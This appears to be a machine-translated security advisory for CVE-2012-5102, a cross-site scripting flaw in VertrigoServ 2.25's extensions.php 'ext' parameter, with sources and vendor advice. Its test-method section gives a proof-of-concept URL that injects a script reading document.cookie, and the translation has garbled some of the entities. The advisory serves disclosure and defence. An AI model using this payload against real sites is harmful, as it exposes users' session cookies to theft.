Release date:
Updated on: 2012-10-04
Affected Systems:
VertrigoServ 2.25
Description:
--------------------------------------------------------------------------------
Bugtraq id: 51293
Cve id: CVE-2012-5102
VertrigoServ is a Windows Installer for the Apache/PHP/MySQL/Phpmyadmin environment.
VertrigoServ 2.25 and other versions of inc/extensions. php have a security vulnerability that allows remote attackers to inject arbitrary Web scripts or HTML through the ext parameter.
<* Source: Stefan Schurtz
Link: http://secunia.com/advisories/47469
Http://archives.neohapsis.com/archives/bugtraq/2012-01/0034.html
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/inc/extensions.php? Mode = extensions & amp; ext = & #039; & quot; & lt;/script & gt; & lt; script & gt; alert (document. cookie) & lt;/script & gt;
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
VertrigoServ
------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://vertrigo.sourceforge.net/index.php